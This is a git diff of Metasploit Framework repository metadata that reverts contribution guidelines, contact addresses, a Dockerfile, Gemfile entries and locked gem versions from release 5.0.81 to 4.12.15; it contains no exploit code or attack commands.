+  - git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
 
 notifications:
   irc: "irc.freenode.org#msfnotify"
@@ -70,6 +46,3 @@ branches:
   except:
     - gh-pages
     - metakitty
-
-services:
-  - docker

.yardopts

@@ -2,7 +2,7 @@
 --exclude samples/
 --exclude \.ut\.rb/
 --exclude \.ts\.rb/
---files CONTRIBUTING.md,COPYING,LICENSE
+--files CONTRIBUTING.md,COPYING,HACKING,LICENSE
 app/**/*.rb
 lib/msf/**/*.rb
 lib/metasploit/**/*.rb

CODE_OF_CONDUCT.md

@@ -37,7 +37,7 @@ when an individual is representing the project or its community.
 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
 the incident involves a committer, you may report directly to
-caitlin_condon@rapid7.com or todb@metasploit.com.
+egypt@metasploit.com or todb@metasploit.com.
 
 All complaints will be reviewed and investigated and will result in a
 response that is deemed necessary and appropriate to the circumstances.

CONTRIBUTING.md

@@ -1,108 +1,120 @@
+# Hello, World!
+
+Thanks for your interest in making Metasploit -- and therefore, the
+world -- a better place!
+
+Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
+Please try to be as specific as you can about your problem; include steps
+to reproduce (cut and paste from your console output if it's helpful) and
+what you were expecting to happen.
+
+Are you about to report a security vulnerability in Metasploit itself?
+How ironic! Please take a look at Rapid7's [Vulnerability
+Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
+your report to security@rapid7.com using our [PGP key].
+
+Are you about to contribute some new functionality, a bug fix, or a new
+Metasploit module? If so, read on...
+
 # Contributing to Metasploit
-Thank you for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved. 
 
-## Code Free Contributions 
-Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
+What you see here in CONTRIBUTING.md is a bullet point list of the do's
+and don'ts of how to make sure *your* valuable contributions actually
+make it into Metasploit's master branch.
 
- - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new) with detailed information about your issue or idea: 
- 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
- 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
- - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed! 
- - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality. 
- - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!  
- - [Add module documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation). New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand. 
+If you care not to follow these rules, your contribution **will** be
+closed. Sorry!
 
+This is intended to be a **short** list. The [wiki] is much more
+exhaustive and reveals many mysteries. If you read nothing else, take a
+look at the standard [development environment setup] guide
+and Metasploit's [Common Coding Mistakes].
 
 ## Code Contributions
-For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit). It will help you to get started and avoid some common mistakes.
 
-Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.  
-
-Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
-will be closed. We need to ensure the code we're adding to master is written to a high standard.
-
-
-### Code Contribution Do's & Don'ts:
---
-#### <u>Pull Requests</u>
-**Pull request [PR#9966] is a good example to follow.**
-
-* **Do** create a [topic branch] to work on instead of working directly on `master`. This helps to:
-	*  Protect the process.
-	* Ensures users are aware of commits on the branch being considered for merge.  
-	* Allows for a location for more commits to be offered without mingling with other contributor changes.
-	* Allows contributors to make progress while a PR is still being reviewed.
+* **Do** stick to the [Ruby style guide].
+* **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
 * **Do** follow the [50/72 rule] for Git commit messages.
-* **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
-* **Do** target your pull request to the **master branch**.
+* **Don't** use the default merge messages when merging from other branches.
+* **Do** create a [topic branch] to work on instead of working directly on `master`.
+* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
+
+### Pull Requests
+
+* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
 * **Do** specify a descriptive title to make searching for your pull request easier.
-* **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
+* **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
-* **Do** [reference associated issues] in your pull request description.
+* **Do** [reference associated issues] in your pull request description
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
-* **Don't** post questions in older closed PRs.
 
-#### <u>New Modules</u>
-* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
-* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
-* **Do** use the many module mixin [API]s.
-* **Do** include instructions on how to setup the vulnerable environment or software.
-* **Do** include [Module Documentation] showing sample run-throughs.
+Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
+
+#### New Modules
+
+* **Do** run `tools/dev/msftidy.rb` against your module and fix any errors or warnings that come up.
+  - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
+* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
 * **Don't** include more than one module per pull request.
-* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and anything "serious" can be done with post modules and local exploits.
+* **Do** include instructions on how to setup the vulnerable environment or software
+* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs
 
-#### <u>Library Code</u>
-* **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
+
+
+#### Scripts
+
+* **Don't** submit new [scripts].  Scripts are shipped as examples for
+  automating local tasks, and anything "serious" can be done with post
+  modules and local exploits.
+
+#### Library Code
+
+* **Do** write [RSpec] tests - even the smallest change in library land can thoroughly screw things up.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
 
-#### <u>Bug Fixes</u>
+#### Bug Fixes
+
 * **Do** include reproduction steps in the form of verification steps.
-* **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.
+* **Do** include a link to any corresponding [Issues] in the format of
+  `See #1234` in your commit description.
 
 ## Bug Reports
 
-Please report vulnerabilities in Rapid7 software directly to security@rapid7.com. For more on our disclosure policy and Rapid7's approach to coordinated disclosure, [head over here](https://www.rapid7.com/security). 
-
-When reporting Metasploit issues:
+* **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
 * **Do** write a detailed description of your bug and use a descriptive title.
-* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
+* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
 * **Don't** file duplicate reports; search for your bug before filing a new report.
-* **Don't** attempt to report issues on a closed PR.
 
-If you need some more guidance, talk to the main body of open source contributors over on our
-[Metasploit Slack] or [#metasploit on Freenode IRC].
+If you need some more guidance, talk to the main body of open
+source contributors over on the [Freenode IRC channel],
+or e-mail us at the [metasploit-hackers] mailing list.
 
-Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
-curve, so keep it up!
+Also, **thank you** for taking the few moments to read this far! You're
+already way ahead of the curve, so keep it up!
 
-[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
-[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
-[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
-[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
-[Report a security vulnerability in Metasploit itself]:https://www.rapid7.com/disclosure.jsp
-[development environment]:http://r-7.co/MSF-DEV
-[proof-of-concept exploits]:https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true
+[Issue Tracker]:http://r-7.co/MSF-BUGv1
+[PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
+[wiki]:https://github.com/rapid7/metasploit-framework/wiki
+[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
+[development environment setup]:http://r-7.co/MSF-DEV
+[Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
 [Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
 [Rubocop]:https://rubygems.org/search?query=rubocop
 [50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
 [topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
-[draft PR]:https://help.github.com/en/articles/about-pull-requests#draft-pull-requests
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
-[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
+[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
+[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
 [API]:https://rapid7.github.io/metasploit-framework/api
-[Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
-[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
-[Better Specs]:http://www.betterspecs.org/
+[Better Specs]:http://betterspecs.org
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
-[Metasploit Slack]:https://www.metasploit.com/slack
-[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers

COPYING

@@ -1,4 +1,4 @@
-Copyright (C) 2006-2020, Rapid7, Inc.
+Copyright (C) 2006-2016, Rapid7, Inc.
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without modification,

CURRENT.md

@@ -1,20 +0,0 @@
-Active Metasploit 5 development will sometimes push aggressive changes.
-Integrations with 3rd-party tools, as well as general usage, may change quickly
-from day to day. Some of the steps for dealing with major changes will be
-documented here. We will continue to maintain the Metasploit 4.x branch until
-Metasploit 5.0 is released.
-
-**2018/01/17 - [internal] module cache reworked to not store metadata in PostgreSQL**
-
-Metasploit no longer stores module metadata in a PostgreSQL database, instead
-storing it in a cache file in your local ~/.msf4 config directory. This has a
-number of advantages:
-
- * Fast searches whether you have the database enabled or not (no more slow search mode)
- * Faster load time for msfconsole, the cache loads more quickly
- * Private module data is not uploaded to a shared database, no collisions
- * Adding or deleting modules no longer displays file-not-found error messages on start in msfconsole
- * Reduced memory consumption
-
-Code that reads directly from the Metasploit database for module data will need
-to use the new module search API.

Dockerfile

@@ -1,69 +0,0 @@
-FROM ruby:2.6.5-alpine3.10 AS builder
-LABEL maintainer="Rapid7"
-
-ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
-ENV APP_HOME=/usr/src/metasploit-framework
-ENV BUNDLE_IGNORE_MESSAGES="true"
-WORKDIR $APP_HOME
-
-COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME/
-COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
-COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
-COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
-
-RUN apk add --no-cache \
-      autoconf \
-      bison \
-      build-base \
-      ruby-dev \
-      openssl-dev \
-      readline-dev \
-      sqlite-dev \
-      postgresql-dev \
-      libpcap-dev \
-      libxml2-dev \
-      libxslt-dev \
-      yaml-dev \
-      zlib-dev \
-      ncurses-dev \
-      git \
-    && echo "gem: --no-document" > /etc/gemrc \
-    && gem update --system 3.0.6 \
-    && bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
-    # temp fix for https://github.com/bundler/bundler/issues/6680
-    && rm -rf /usr/local/bundle/cache \
-    # needed so non root users can read content of the bundle
-    && chmod -R a+r /usr/local/bundle
-
-
-FROM ruby:2.6.5-alpine3.10
-LABEL maintainer="Rapid7"
-
-ENV APP_HOME=/usr/src/metasploit-framework
-ENV NMAP_PRIVILEGED=""
-ENV METASPLOIT_GROUP=metasploit
-
-# used for the copy command
-RUN addgroup -S $METASPLOIT_GROUP
-
-RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec
-
-RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
-RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
-
-COPY --from=builder /usr/local/bundle /usr/local/bundle
-RUN chown -R root:metasploit /usr/local/bundle
-COPY . $APP_HOME/
-RUN chown -R root:metasploit $APP_HOME/
-RUN chmod 664 $APP_HOME/Gemfile.lock
-RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
-
-WORKDIR $APP_HOME
-
-# we need this entrypoint to dynamically create a user
-# matching the hosts UID and GID so we can mount something
-# from the users home directory. If the IDs don't match
-# it results in access denied errors.
-ENTRYPOINT ["docker/entrypoint.sh"]
-
-CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]

Gemfile

@@ -3,12 +3,12 @@ source 'https://rubygems.org'
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
 gemspec name: 'metasploit-framework'
 
-gem 'sqlite3', '~>1.3.0'
-
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
   # code coverage for tests
-  gem 'simplecov', '0.18.2'
+  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+  # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
+  gem 'simplecov'
 end
 
 group :development do
@@ -17,21 +17,15 @@ group :development do
   # generating documentation
   gem 'yard'
   # for development and testing purposes
-  gem 'pry-byebug'
+  gem 'pry'
   # module documentation
-  gem 'octokit'
-  # memory profiling
-  gem 'memory_profiler'
-  # cpu profiling
-  gem 'ruby-prof'
-  # Metasploit::Aggregator external session proxy
-  # disabled during 2.5 transition until aggregator is available
-  #gem 'metasploit-aggregator'
+  gem 'octokit', '~> 4.0'
+  # rails-upgrade staging gems
 end
 
 group :development, :test do
   # automatically include factories from spec/factories
-  gem 'factory_bot_rails'
+  gem 'factory_girl_rails'
   # Make rspec output shorter and more useful
   gem 'fivemat'
   # running documentation generation tasks and rspec tasks
@@ -39,12 +33,14 @@ group :development, :test do
   # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
   # environment is development
   gem 'rspec-rails'
-  gem 'rspec-rerun'
-  gem 'rubocop'
-  gem 'swagger-blocks'
 end
 
 group :test do
+  # cucumber extension for testing command line applications, like msfconsole
+  gem 'aruba'
+  # cucumber + automatic database cleaning with database_cleaner
+  gem 'cucumber-rails', :require => false
+  gem 'shoulda-matchers'
   # Manipulate Time.now in specs
   gem 'timecop'
 end

Gemfile.local.example

@@ -27,6 +27,8 @@ end
 
 # Create a custom group
 group :local do
+  # Use pry-debugger to step through code during development
+  gem 'pry-debugger', '~> 0.2'
   # Add the lab gem so that the 'lab' plugin will work again
   gem 'lab', '~> 0.2.7'
 end

Gemfile.lock

@@ -1,221 +1,160 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (5.0.81)
+    metasploit-framework (4.12.15)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
-      aws-sdk-ec2
-      aws-sdk-iam
-      aws-sdk-s3
-      bcrypt (= 3.1.12)
-      bcrypt_pbkdf
+      bcrypt
       bit-struct
-      concurrent-ruby (= 1.0.5)
-      dnsruby
-      ed25519
-      em-http-request
-      eventmachine
-      faker
-      faraday (<= 0.17.0)
-      faye-websocket
       filesize
-      hrr_rb_ssh (= 0.3.0.pre2)
       jsobfu
       json
       metasm
-      metasploit-concern (~> 2.0.0)
-      metasploit-credential (~> 3.0.0)
-      metasploit-model (~> 2.0.4)
-      metasploit-payloads (= 1.3.86)
-      metasploit_data_models (~> 3.0.10)
-      metasploit_payloads-mettle (= 0.5.19)
-      mqtt
+      metasploit-concern
+      metasploit-credential
+      metasploit-model
+      metasploit-payloads (= 1.1.13)
+      metasploit_data_models
+      metasploit_payloads-mettle
       msgpack
-      nessus_rest
       net-ssh
       network_interface
-      nexpose
       nokogiri
       octokit
       openssl-ccm
-      openvas-omp
       packetfu
       patch_finder
       pcaprub
-      pdf-reader
-      pg (~> 0.20)
+      pg
       railties
-      rb-readline
+      rb-readline-r7
       recog
       redcarpet
-      rex-arch
-      rex-bin_tools
-      rex-core
-      rex-encoder
-      rex-exploitation
       rex-java
-      rex-mime
-      rex-nop
-      rex-ole
       rex-powershell
       rex-random_identifier
       rex-registry
-      rex-rop_builder
-      rex-socket
-      rex-sslscan
       rex-struct2
       rex-text
       rex-zip
-      ruby-macho
-      ruby_smb
-      rubyntlm
+      robots
       rubyzip
-      sinatra
       sqlite3
       sshkey
-      thin
       tzinfo
       tzinfo-data
-      warden
-      windows_error
-      xdr
-      xmlrpc
 
 GEM
   remote: https://rubygems.org/
   specs:
-    Ascii85 (1.0.3)
-    actionpack (4.2.11.1)
-      actionview (= 4.2.11.1)
-      activesupport (= 4.2.11.1)
+    actionpack (4.2.7)
+      actionview (= 4.2.7)
+      activesupport (= 4.2.7)
       rack (~> 1.6)
       rack-test (~> 0.6.2)
       rails-dom-testing (~> 1.0, >= 1.0.5)
       rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.11.1)
-      activesupport (= 4.2.11.1)
+    actionview (4.2.7)
+      activesupport (= 4.2.7)
       builder (~> 3.1)
       erubis (~> 2.7.0)
       rails-dom-testing (~> 1.0, >= 1.0.5)
-      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.11.1)
-      activesupport (= 4.2.11.1)
+      rails-html-sanitizer (~> 1.0, >= 1.0.2)
+    activemodel (4.2.7)
+      activesupport (= 4.2.7)
       builder (~> 3.1)
-    activerecord (4.2.11.1)
-      activemodel (= 4.2.11.1)
-      activesupport (= 4.2.11.1)
+    activerecord (4.2.7)
+      activemodel (= 4.2.7)
+      activesupport (= 4.2.7)
       arel (~> 6.0)
-    activesupport (4.2.11.1)
+    activesupport (4.2.7)
       i18n (~> 0.7)
+      json (~> 1.7, >= 1.7.7)
       minitest (~> 5.1)
       thread_safe (~> 0.3, >= 0.3.4)
       tzinfo (~> 1.1)
-    addressable (2.7.0)
-      public_suffix (>= 2.0.2, < 5.0)
-    afm (0.2.2)
-    arel (6.0.4)
-    arel-helpers (2.11.0)
-      activerecord (>= 3.1.0, < 7)
-    ast (2.4.0)
-    aws-eventstream (1.0.3)
-    aws-partitions (1.281.0)
-    aws-sdk-core (3.91.0)
-      aws-eventstream (~> 1.0, >= 1.0.2)
-      aws-partitions (~> 1, >= 1.239.0)
-      aws-sigv4 (~> 1.1)
-      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.149.0)
-      aws-sdk-core (~> 3, >= 3.71.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.34.0)
-      aws-sdk-core (~> 3, >= 3.71.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.30.0)
-      aws-sdk-core (~> 3, >= 3.71.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.61.0)
-      aws-sdk-core (~> 3, >= 3.83.0)
-      aws-sdk-kms (~> 1)
-      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.1.1)
-      aws-eventstream (~> 1.0, >= 1.0.2)
-    bcrypt (3.1.12)
-    bcrypt_pbkdf (1.0.1)
-    bindata (2.4.6)
-    bit-struct (0.16)
-    builder (3.2.4)
-    byebug (11.1.1)
-    coderay (1.1.2)
-    concurrent-ruby (1.0.5)
-    cookiejar (0.3.3)
-    crass (1.0.6)
-    daemons (1.3.1)
-    diff-lcs (1.3)
-    dnsruby (1.61.3)
-      addressable (~> 2.5)
-    docile (1.3.2)
-    ed25519 (1.2.4)
-    em-http-request (1.1.5)
-      addressable (>= 2.3.4)
-      cookiejar (!= 0.3.1)
-      em-socksify (>= 0.3)
-      eventmachine (>= 1.0.3)
-      http_parser.rb (>= 0.6.0)
-    em-socksify (0.3.2)
-      eventmachine (>= 1.0.0.beta.4)
+    addressable (2.4.0)
+    arel (6.0.3)
+    arel-helpers (2.3.0)
+      activerecord (>= 3.1.0, < 6)
+    aruba (0.14.1)
+      childprocess (~> 0.5.6)
+      contracts (~> 0.9)
+      cucumber (>= 1.3.19)
+      ffi (~> 1.9.10)
+      rspec-expectations (>= 2.99)
+      thor (~> 0.19)
+    bcrypt (3.1.11)
+    bit-struct (0.15.0)
+    builder (3.2.2)
+    capybara (2.7.1)
+      addressable
+      mime-types (>= 1.16)
+      nokogiri (>= 1.3.3)
+      rack (>= 1.0.0)
+      rack-test (>= 0.5.4)
+      xpath (~> 2.0)
+    childprocess (0.5.9)
+      ffi (~> 1.0, >= 1.0.11)
+    coderay (1.1.1)
+    contracts (0.14.0)
+    cucumber (2.4.0)
+      builder (>= 2.1.2)
+      cucumber-core (~> 1.5.0)
+      cucumber-wire (~> 0.0.1)
+      diff-lcs (>= 1.1.3)
+      gherkin (~> 4.0)
+      multi_json (>= 1.7.5, < 2.0)
+      multi_test (>= 0.1.2)
+    cucumber-core (1.5.0)
+      gherkin (~> 4.0)
+    cucumber-rails (1.4.3)
+      capybara (>= 1.1.2, < 3)
+      cucumber (>= 1.3.8, < 3)
+      mime-types (>= 1.16, < 4)
+      nokogiri (~> 1.5)
+      railties (>= 3, < 5)
+    cucumber-wire (0.0.1)
+    diff-lcs (1.2.5)
+    docile (1.1.5)
     erubis (2.7.0)
-    eventmachine (1.2.7)
-    factory_bot (5.1.1)
-      activesupport (>= 4.2.0)
-    factory_bot_rails (5.1.1)
-      factory_bot (~> 5.1.0)
-      railties (>= 4.2.0)
-    faker (2.2.1)
-      i18n (>= 0.8)
-    faraday (0.17.0)
+    factory_girl (4.7.0)
+      activesupport (>= 3.0.0)
+    factory_girl_rails (4.7.0)
+      factory_girl (~> 4.7.0)
+      railties (>= 3.0.0)
+    faraday (0.9.2)
       multipart-post (>= 1.2, < 3)
-    faye-websocket (0.10.9)
-      eventmachine (>= 0.12.0)
-      websocket-driver (>= 0.5.1)
-    filesize (0.2.0)
-    fivemat (1.3.7)
-    hashery (2.1.2)
-    hrr_rb_ssh (0.3.0.pre2)
-      ed25519 (~> 1.2)
-    http_parser.rb (0.6.0)
-    i18n (0.9.5)
-      concurrent-ruby (~> 1.0)
-    jaro_winkler (1.5.4)
-    jmespath (1.4.0)
-    jsobfu (0.4.2)
-      rkelly-remix
-    json (2.3.0)
-    loofah (2.4.0)
-      crass (~> 1.0.2)
+    ffi (1.9.14)
+    filesize (0.1.1)
+    fivemat (1.3.2)
+    gherkin (4.0.0)
+    i18n (0.7.0)
+    jsobfu (0.4.1)
+      rkelly-remix (= 0.0.6)
+    json (1.8.3)
+    loofah (2.0.3)
       nokogiri (>= 1.5.9)
-    memory_profiler (0.9.14)
-    metasm (1.0.4)
-    metasploit-concern (2.0.5)
+    metasm (1.0.2)
+    metasploit-concern (2.0.1)
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (3.0.4)
+    metasploit-credential (2.0.3)
       metasploit-concern
       metasploit-model
-      metasploit_data_models (>= 3.0.0)
-      net-ssh
+      metasploit_data_models
       pg
       railties
-      rex-socket
       rubyntlm
       rubyzip
-    metasploit-model (2.0.4)
+    metasploit-model (2.0.0)
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.86)
-    metasploit_data_models (3.0.10)
+    metasploit-payloads (1.1.13)
+    metasploit_data_models (2.0.0)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       arel-helpers
@@ -225,225 +164,136 @@ GEM
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.19)
-    method_source (0.9.2)
-    mini_portile2 (2.4.0)
-    minitest (5.14.0)
-    mqtt (0.5.0)
-    msgpack (1.3.3)
-    multipart-post (2.1.1)
-    nessus_rest (0.1.6)
-    net-ssh (5.2.0)
-    network_interface (0.0.2)
-    nexpose (7.2.1)
-    nokogiri (1.10.9)
-      mini_portile2 (~> 2.4.0)
-    octokit (4.17.0)
-      faraday (>= 0.9)
-      sawyer (~> 0.8.0, >= 0.5.3)
-    openssl-ccm (1.2.2)
-    openvas-omp (0.0.4)
-    packetfu (1.1.13)
-      pcaprub
-    parallel (1.19.1)
-    parser (2.7.0.4)
-      ast (~> 2.4.0)
+    metasploit_payloads-mettle (0.0.5)
+    method_source (0.8.2)
+    mime-types (3.1)
+      mime-types-data (~> 3.2015)
+    mime-types-data (3.2016.0521)
+    mini_portile2 (2.1.0)
+    minitest (5.9.0)
+    msgpack (1.0.0)
+    multi_json (1.12.1)
+    multi_test (0.1.2)
+    multipart-post (2.0.0)
+    net-ssh (3.2.0)
+    network_interface (0.0.1)
+    nokogiri (1.6.8)
+      mini_portile2 (~> 2.1.0)
+      pkg-config (~> 1.1.7)
+    octokit (4.3.0)
+      sawyer (~> 0.7.0, >= 0.5.3)
+    openssl-ccm (1.2.1)
+    packetfu (1.1.11)
+      network_interface (~> 0.0)
+      pcaprub (~> 0.12)
     patch_finder (1.0.2)
-    pcaprub (0.13.0)
-    pdf-reader (2.4.0)
-      Ascii85 (~> 1.0.0)
-      afm (~> 0.2.1)
-      hashery (~> 2.0)
-      ruby-rc4
-      ttfunk
-    pg (0.21.0)
+    pcaprub (0.12.4)
+    pg (0.18.4)
     pg_array_parser (0.0.9)
-    postgres_ext (3.0.1)
-      activerecord (~> 4.0)
+    pkg-config (1.1.7)
+    postgres_ext (3.0.0)
+      activerecord (>= 4.0.0)
       arel (>= 4.0.1)
       pg_array_parser (~> 0.0.9)
-    pry (0.12.2)
+    pry (0.10.4)
       coderay (~> 1.1.0)
-      method_source (~> 0.9.0)
-    pry-byebug (3.8.0)
-      byebug (~> 11.0)
-      pry (~> 0.10)
-    public_suffix (4.0.3)
-    rack (1.6.13)
-    rack-protection (1.5.5)
-      rack
+      method_source (~> 0.8.1)
+      slop (~> 3.4)
+    rack (1.6.4)
     rack-test (0.6.3)
       rack (>= 1.0)
     rails-deprecated_sanitizer (1.0.3)
       activesupport (>= 4.2.0.alpha)
-    rails-dom-testing (1.0.9)
-      activesupport (>= 4.2.0, < 5.0)
-      nokogiri (~> 1.6)
+    rails-dom-testing (1.0.7)
+      activesupport (>= 4.2.0.beta, < 5.0)
+      nokogiri (~> 1.6.0)
       rails-deprecated_sanitizer (>= 1.0.1)
-    rails-html-sanitizer (1.3.0)
-      loofah (~> 2.3)
-    railties (4.2.11.1)
-      actionpack (= 4.2.11.1)
-      activesupport (= 4.2.11.1)
+    rails-html-sanitizer (1.0.3)
+      loofah (~> 2.0)
+    railties (4.2.7)
+      actionpack (= 4.2.7)
+      activesupport (= 4.2.7)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
-    rainbow (3.0.0)
-    rake (13.0.1)
-    rb-readline (0.5.5)
-    recog (2.3.7)
+    rake (11.2.2)
+    rb-readline-r7 (0.5.2.0)
+    recog (2.0.21)
       nokogiri
-    redcarpet (3.5.0)
-    rex-arch (0.1.13)
-      rex-text
-    rex-bin_tools (0.1.6)
-      metasm
-      rex-arch
-      rex-core
-      rex-struct2
-      rex-text
-    rex-core (0.1.13)
-    rex-encoder (0.1.4)
-      metasm
-      rex-arch
-      rex-text
-    rex-exploitation (0.1.22)
-      jsobfu
-      metasm
-      rex-arch
-      rex-encoder
-      rex-text
-    rex-java (0.1.5)
-    rex-mime (0.1.5)
-      rex-text
-    rex-nop (0.1.1)
-      rex-arch
-    rex-ole (0.1.6)
-      rex-text
-    rex-powershell (0.1.87)
+    redcarpet (3.3.4)
+    rex-java (0.1.2)
+    rex-powershell (0.1.0)
       rex-random_identifier
       rex-text
-      ruby-rc4
-    rex-random_identifier (0.1.4)
